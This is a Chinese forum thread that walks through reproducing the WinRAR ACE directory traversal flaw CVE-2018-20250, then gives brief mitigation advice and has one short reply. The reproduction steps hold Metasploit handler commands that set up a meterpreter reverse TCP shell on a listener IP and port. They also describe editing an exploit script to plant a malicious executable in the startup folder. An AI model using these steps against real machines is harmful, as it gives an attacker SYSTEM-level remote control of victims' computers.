| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1845 人关注过本帖
标题:WinRAR目录穿越漏洞
只看楼主 加入收藏
源哥
Rank: 1
等 级:新手上路
帖 子:15
专家分:0
注 册:2019-9-5
收藏
 问题点数:0 回复次数:1 
WinRAR目录穿越漏洞
该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行
 
漏洞编号:CVE-2018-20250
 
影响版本:
 
    WinRAR < 5.70 Beta 1
 
    Bandizip < = 6.2.0.0
 
    好压(2345压缩) < = 5.9.8.10907
 
    360压缩 < = 4.0.0.1170
 
复现环境
 
exp下载:
 
https://  
 
复现过程
 
1.使用Metasploit生成Payload
 
2.使用exp生成恶意程序
 
cd /root/Desktopgit clone https:// CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
 
将exp.py中的evil_filename = “calc.exe”改为”WinRAR.exe”
 
将CVE-2018-20250文件夹复制到Windows10中执行  
 
3.在靶机上运行恶意程序
 
将test.rar 投放到win8上 解压运行
 
4.在kali上监听metasploit
 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run  
 
5.控制靶机
 
Win8重启之后 kali会接受到会话 此时执行shell
 
进入到win8系统的system权限
 
漏洞防御
 
1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御
 
2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1
 
3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本
搜索更多相关主题的帖子: 执行 exp handler 漏洞 目录 
2019-09-17 10:34
冬冬123
Rank: 2
等 级:论坛游民
帖 子:80
专家分:67
注 册:2013-3-3
收藏
得分:0 
厉害的样子

天下寒士俱欢言!!!
2020-01-14 15:28
快速回复:WinRAR目录穿越漏洞
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.027108 second(s), 10 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved